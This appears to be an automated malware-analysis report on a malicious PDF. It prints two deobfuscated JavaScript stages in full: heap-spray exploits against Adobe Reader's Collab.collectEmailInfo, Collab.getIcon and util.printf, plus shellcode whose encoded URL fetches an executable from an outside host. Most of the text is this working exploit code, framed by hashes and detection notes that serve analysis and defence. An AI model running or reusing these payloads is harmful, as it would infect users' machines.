OCUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzOSUzMCUzOSUzMCUyNSU3NSUzOSUzMCUzOSUzMCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyMCUzZCUyMCU2YyU0YyU0YyU1NiU1MCUzOSUzMCUzNiU2NCUyOCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyYyUyMCU2ZSU3NyU1MCU3MCU2NSU2MiUzNiU3YSU0YiUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MiUzOSU1OCU0NSU3NCU1MyU3YSU3YSUzMCUyMCUzZCUyMCUyOCU2ZSUzMiU0MSU2YSU3YSUzOCUzMCU3MCU2YyUyMCUyZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUyOSUyMCUyZiUyMCU2YyU3MCU1MCUzMyU0NSU1NiUzMCU0NyU0YiUzYiUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU3NiU2MSU3MiUyMCU1NiU0ZSU2YiU1NSU0ZSU1YSU3NCU1MSU2ZiUyMCUzZCUyMCUzMCUzYiUyMCU1NiU0ZSU2YiU1NSU0ZSU1YSU3NCU1MSU2ZiUyMCUzYyUyMCU0MiUzOSU1OCU0NSU3NCU1MyU3YSU3YSUzMCUzYiUyMCU1NiU0ZSU2YiU1NSU0ZSU1YSU3NCU1MSU2ZiUyYiUyYiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU2YyU0YyUzMCU3MSU1MSU0OCU0NCU2ZCU3MiU1YiU1NiU0ZSU2YiU1NSU0ZSU1YSU3NCU1MSU2ZiU1ZCUyMCUzZCUyMCU3OSU1MyU3MiU1NyU3MyU0MyU2NyU2YSU2NCUyMCUyYiUyMCU0MSU3NiU2YyUzNyU2NyUzMyU0ZSU2MSU1MyUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU0NyU1YSUzNSU2YSU0OSU0NCU1MCU1MyU1NCUyOCUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3MiU2ZSU1MyU3MCU0NiU2MiU0ZCU1NCU1NiUyMCUzZCUyMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzZCUyMCU2MSU3MCU3MCUyZSU3NiU2OSU2NSU3NyU2NSU3MiU1NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyZSU3NCU2ZiU1MyU3NCU3MiU2OSU2ZSU2NyUyOCUyOSUzYiUyMCUyMCUyMCUyMCU2MSU3MCU3MCUyZSU2MyU2YyU2NSU2MSU3MiU1NCU2OSU2ZCU2NSU0ZiU3NSU3NCUyOCU0OSU0MiU0NyU0YiU2YSU2NiU0OCU3NyUzOSUyOSUzYiUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzZSUzZCUyMCUzOCUyMCUyNiUyNiUyMCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzMiUyOSUyMCU3YyU3YyUyMCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzYyUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU1NSU0NyU0OCU3NCU1MSU2MyU0NiU3NyUzMyUyOCUzMCUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1NSU3MiU2NyUzNyU0OCU0NiU0MiUzMiU1OSUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzMCU2MyUzMCU2MyUyNSU3NSUzMCU2MyUzMCU2MyUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU1NSU3MiU2NyUzNyU0OCU0NiU0MiUzMiU1OSUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzNCUzNCUzOSUzNSUzMiUyOSUyMCU1NSU3MiU2NyUzNyU0OCU0NiU0MiUzMiU1OSUyMCUyYiUzZCUyMCU1NSU3MiU2NyUzNyU0OCU0NiU0MiUzMiU1OSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NyU1MSUzMSU3MyU1OSU2ZiU0YiU0ZiUzNSUyMCUzZCUyMCU3NCU2OCU2OSU3MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3MSU2YyU1OCU1MiU2MSUzMSU3NyU1YSU1NSUyMCUzZCUyMCU0MyU2ZiU2YyU2YyU2MSU2MiUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NyU1MSUzMSU3MyU1OSU2ZiU0YiU0ZiUzNSU1YiUyMiU2MyU2ZiU2YyU2YyU2MSU2MiU1MyU3NCU2ZiU3MiU2NSUyMiU1ZCUyMCUzZCUyMCU3MSU2YyU1OCU1MiU2MSUzMSU3NyU1YSU1NSU1YiUyMiU2MyU2ZiU2YyU2YyU2NSU2MyU3NCU0NSU2ZCU2MSU2OSU2YyU0OSU2ZSU2NiU2ZiUyMiU1ZCUyOCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3MyU3NSU2MiU2YSUyMCUzYSUyMCUyMiUyMiUyYyUyMCU2ZCU3MyU2NyUyMCUzYSUyMCU1NSU3MiU2NyUzNyU0OCU0NiU0MiUzMiU1OSUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzZSUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCUyNiUyNiUyMCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzNCUyOSUyMCU3YyU3YyUyMCUyOCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzZSUzZCUyMCUzOSUyMCUyNiUyNiUyMCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzYyUyMCUzOSUyZSUzMSUyOSUyMCU3YyU3YyUyMCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzYyUzZCUyMCUzNyUyZSUzMSUzMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NCU3MiU3OSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU2MSU3MCU3MCUyZSU2NCU2ZiU2MyUyZSU0MyU2ZiU2YyU2YyU2MSU2MiUyZSU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1NSU0NyU0OCU3NCU1MSU2MyU0NiU3NyUzMyUyOCUzMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MiU0OSU1MyUzNiU2MiU0YiU2YyU2OSU2MiUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSUzMCUzOSUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU0MiU0OSU1MyUzNiU2MiU0YiU2YyU2OSU2MiUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzMCU3OCUzNCUzMCUzMCUzMCUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU0MiU0OSU1MyUzNiU2MiU0YiU2YyU2OSU2MiUyMCUyYiUzZCUyMCU0MiU0OSU1MyUzNiU2MiU0YiU2YyU2OSU2MiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU0MiU0OSU1MyUzNiU2MiU0YiU2YyU2OSU2MiUyMCUzZCUyMCUyMiU0ZSUyZSUyMiUyMCUyYiUyMCU0MiU0OSU1MyUzNiU2MiU0YiU2YyU2OSU2MiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1NiU3NCU2MyU1YSU0OCUzNCU2MSUzMCU2MyUyMCUzZCUyMCU2MSU3MCU3MCUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1NiU3NCU2MyU1YSU0OCUzNCU2MSUzMCU2MyU1YiUyMiU2NCU2ZiU2MyUyMiU1ZCU1YiUyMiU0MyU2ZiU2YyU2YyU2MSU2MiUyMiU1ZCU1YiUyMiU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyMiU1ZCUyOCU0MiU0OSU1MyUzNiU2MiU0YiU2YyU2OSU2MiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3MiU2ZSU1MyU3MCU0NiU2MiU0ZCU1NCU1NiUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3MiU2ZSU1MyU3MCU0NiU2MiU0ZCU1NCU1NiUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2MyU2MSU3NCU2MyU2OCUyOCU2NSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3MiU2ZSU1MyU3MCU0NiU2MiU0ZCU1NCU1NiUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU3MiU2ZSU1MyU3MCU0NiU2MiU0ZCU1NCU1NiUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzZCUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCU3YyU3YyUyMCU1MCU1MyU1NiU3OSU1NSU3MyU2OSU3OSU0NyUyMCUzZCUzZCUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1NSU0NyU0OCU3NCU1MSU2MyU0NiU3NyUzMyUyOCUzMSUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MiU1NSUzMiU1NCU1MSU2ZCUzMSU3MiU0ZSUyMCUzZCUyMCUyMiUzMSUzMiUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU1MSU2ZiU3NyU1NiU2NCU0NiU3OSU2OSU3MSUyMCUzZCUyMCUzMCUzYiUyMCU1MSU2ZiU3NyU1NiU2NCU0NiU3OSU2OSU3MSUyMCUzYyUyMCUzMiUzNyUzNiUzYiUyMCU1MSU2ZiU3NyU1NiU2NCU0NiU3OSU2OSU3MSUyYiUyYiUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU0MiU1NSUzMiU1NCU1MSU2ZCUzMSU3MiU0ZSUyMCUyYiUzZCUyMCUyMiUzOCUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2NyU1NSU1OSU3NiU1NyU1MiU1OSUzNyU2YSUyMCUzZCUyMCU3NSU3NCU2OSU2YyUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NyU1NSU1OSU3NiU1NyU1MiU1OSUzNyU2YSU1YiUyMiU3MCU3MiU2OSU2ZSU3NCU2NiUyMiU1ZCUyOCUyMiUyNSUzNCUzNSUzMCUzMCUzMCU2NiUyMiUyYyUyMCU0MiU1NSUzMiU1NCU1MSU2ZCUzMSU3MiU0ZSUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3ZCUyMCU3ZCUyMCIpKTsgCiBhcHAuQ2h0RjdPR1pvID0gR1o1aklEUFNUOwogSUJHS2pmSHc5ID0gYXBwLnNldFRpbWVPdXQoImFwcC5DaHRGN09HWm8oKSIsIDEpOwo="); var sssddd = eval; sssddd(aasd);
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6	5116 bytes
SHA-256: `9ac0a9fa59841903cf09d17c58475024a44a39b4e4a7c12ed3cc48e926141573`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s). 23 of 42 identifiers look randomly generated (e.g. 'ChtF7OGZo') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script var lL0qQHDmr = new Array(); var IBGKjfHw9; var lave = eval; lave(unescape(" function lLLVP906d(ySrWsCgjd, nwPpeb6zK) { while(ySrWsCgjd.length * 2 < nwPpeb6zK) { ySrWsCgjd += ySrWsCgjd; } ySrWsCgjd = ySrWsCgjd.substring(0, nwPpeb6zK / 2); return ySrWsCgjd; } ")); lave(unescape(" function UGHtQcFw3(F682pZtLR) { if(F682pZtLR == 0) { var n2Ajz80pl = 0x0c0c0c0c; var Avl7g3NaS = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u682F%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(F682pZtLR == 1) { n2Ajz80pl = 0x30303030; var Avl7g3NaS = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u682F%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(F682pZtLR == 2) { var Avl7g3NaS = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u682F%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var lpP3EV0GK = 0x400000; var X0gAFhKzh = Avl7g3NaS.length * 2; var nwPpeb6zK = lpP3EV0GK - (X0gAFhKzh + 0x38); var ySrWsCgjd = unescape("%u9090%u9090"); ySrWsCgjd = lLLVP906d(ySrWsCgjd, nwPpeb6zK); var B9XEtSzz0 = (n2Ajz80pl - 0x400000) / lpP3EV0GK; for(var VNkUNZtQo = 0; VNkUNZtQo < B9XEtSzz0; VNkUNZtQo++) { lL0qQHDmr[VNkUNZtQo] = ySrWsCgjd + Avl7g3NaS; } } ")); lave(unescape(" function GZ5jIDPST() { var rnSpFbMTV = 0; var PSVyUsiyG = app.viewerVersion.toString(); app.clearTimeOut(IBGKjfHw9); if((PSVyUsiyG >= 8 && PSVyUsiyG < 8.102) \|\| PSVyUsiyG < 7.1) { UGHtQcFw3(0); var Urg7HFB2Y = unescape("%u0c0c%u0c0c"); while(Urg7HFB2Y.length < 44952) Urg7HFB2Y += Urg7HFB2Y; var wQ1sYoKO5 = this; var qlXRa1wZU = Collab; wQ1sYoKO5["collabStore"] = qlXRa1wZU["collectEmailInfo"]( { subj : "", msg : Urg7HFB2Y } ); } if((PSVyUsiyG >= 8.102 && PSVyUsiyG < 8.104) \|\| (PSVyUsiyG >= 9 && PSVyUsiyG < 9.1) \|\| PSVyUsiyG <= 7.101) { try { if(app.doc.Collab.getIcon) { UGHtQcFw3(2); var BIS6bKlib = unescape("%09"); while(BIS6bKlib.length < 0x4000) { BIS6bKlib += BIS6bKlib; } BIS6bKlib = "N." + BIS6bKlib; var VtcZH4a0c = app; VtcZH4a0c["doc"]["Collab"]["getIcon"](BIS6bKlib); rnSpFbMTV = 1; } else { rnSpFbMTV = 1; } } catch(e) { rnSpFbMTV = 1; } if(rnSpFbMTV == 1) { if(PSVyUsiyG == 8.102 \|\| PSVyUsiyG == 7.1) { UGHtQcFw3(1); var BU2TQm1rN = "12999999999999999999"; for(QowVdFyiq = 0; QowVdFyiq < 276; QowVdFyiq++) { BU2TQm1rN += "8"; } var gUYvWRY7j = util; gUYvWRY7j["printf"]("%45000f", BU2TQm1rN); } } } } ")); app.ChtF7OGZo = GZ5jIDPST; IBGKjfHw9 = app.setTimeOut("app.ChtF7OGZo()", 1);
`generic_stage_recovery_001.js`	deobfuscated-js	generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6	5112 bytes
SHA-256: `e973d0a5359bfa77009debecbd64d9e2acb5ed98dd3eb2c2014ffb1fb1d4d58e`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s). 23 of 42 identifiers look randomly generated (e.g. 'ChtF7OGZo') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script var lL0qQHDmr = new Array(); var IBGKjfHw9; var lave = eval; lave(unescape(" function lLLVP906d(ySrWsCgjd, nwPpeb6zK) { while(ySrWsCgjd.length * 2 < nwPpeb6zK) { ySrWsCgjd += ySrWsCgjd; } ySrWsCgjd = ySrWsCgjd.substring(0, nwPpeb6zK / 2); return ySrWsCgjd; } ")); lave(unescape(" function UGHtQcFw3(F682pZtLR) { if(F682pZtLR == 0) { var n2Ajz80pl = 0x0c0c0c0c; var Avl7g3NaS = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u682F%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(F682pZtLR == 1) { n2Ajz80pl = 0x30303030; var Avl7g3NaS = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u682F%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(F682pZtLR == 2) { var Avl7g3NaS = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u682F%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var lpP3EV0GK = 0x400000; var X0gAFhKzh = Avl7g3NaS.length * 2; var nwPpeb6zK = lpP3EV0GK - (X0gAFhKzh + 0x38); var ySrWsCgjd = unescape("%u9090%u9090"); ySrWsCgjd = lLLVP906d(ySrWsCgjd, nwPpeb6zK); var B9XEtSzz0 = (n2Ajz80pl - 0x400000) / lpP3EV0GK; for(var VNkUNZtQo = 0; VNkUNZtQo < B9XEtSzz0; VNkUNZtQo++) { lL0qQHDmr[VNkUNZtQo] = ySrWsCgjd + Avl7g3NaS; } } ")); lave(unescape(" function GZ5jIDPST() { var rnSpFbMTV = 0; var PSVyUsiyG = app.viewerVersion.toString(); app.clearTimeOut(IBGKjfHw9); if((PSVyUsiyG >= 8 && PSVyUsiyG < 8.102) \|\| PSVyUsiyG < 7.1) { UGHtQcFw3(0); var Urg7HFB2Y = unescape("%u0c0c%u0c0c"); while(Urg7HFB2Y.length < 44952) Urg7HFB2Y += Urg7HFB2Y; var wQ1sYoKO5 = this; var qlXRa1wZU = Collab; wQ1sYoKO5["collabStore"] = qlXRa1wZU["collectEmailInfo"]( { subj : "", msg : Urg7HFB2Y } ); } if((PSVyUsiyG >= 8.102 && PSVyUsiyG < 8.104) \|\| (PSVyUsiyG >= 9 && PSVyUsiyG < 9.1) \|\| PSVyUsiyG <= 7.101) { try { if(app.doc.Collab.getIcon) { UGHtQcFw3(2); var BIS6bKlib = unescape(" "); while(BIS6bKlib.length < 0x4000) { BIS6bKlib += BIS6bKlib; } BIS6bKlib = "N." + BIS6bKlib; var VtcZH4a0c = app; VtcZH4a0c["doc"]["Collab"]["getIcon"](BIS6bKlib); rnSpFbMTV = 1; } else { rnSpFbMTV = 1; } } catch(e) { rnSpFbMTV = 1; } if(rnSpFbMTV == 1) { if(PSVyUsiyG == 8.102 \|\| PSVyUsiyG == 7.1) { UGHtQcFw3(1); var BU2TQm1rN = "12999999999999999999"; for(QowVdFyiq = 0; QowVdFyiq < 276; QowVdFyiq++) { BU2TQm1rN += "8"; } var gUYvWRY7j = util; gUYvWRY7j["printf"]("E000f", BU2TQm1rN); } } } } ")); app.ChtF7OGZo = GZ5jIDPST; IBGKjfHw9 = app.setTimeOut("app.ChtF7OGZo()", 1);

Open this report in the interactive analyzer, or submit your own file for analysis.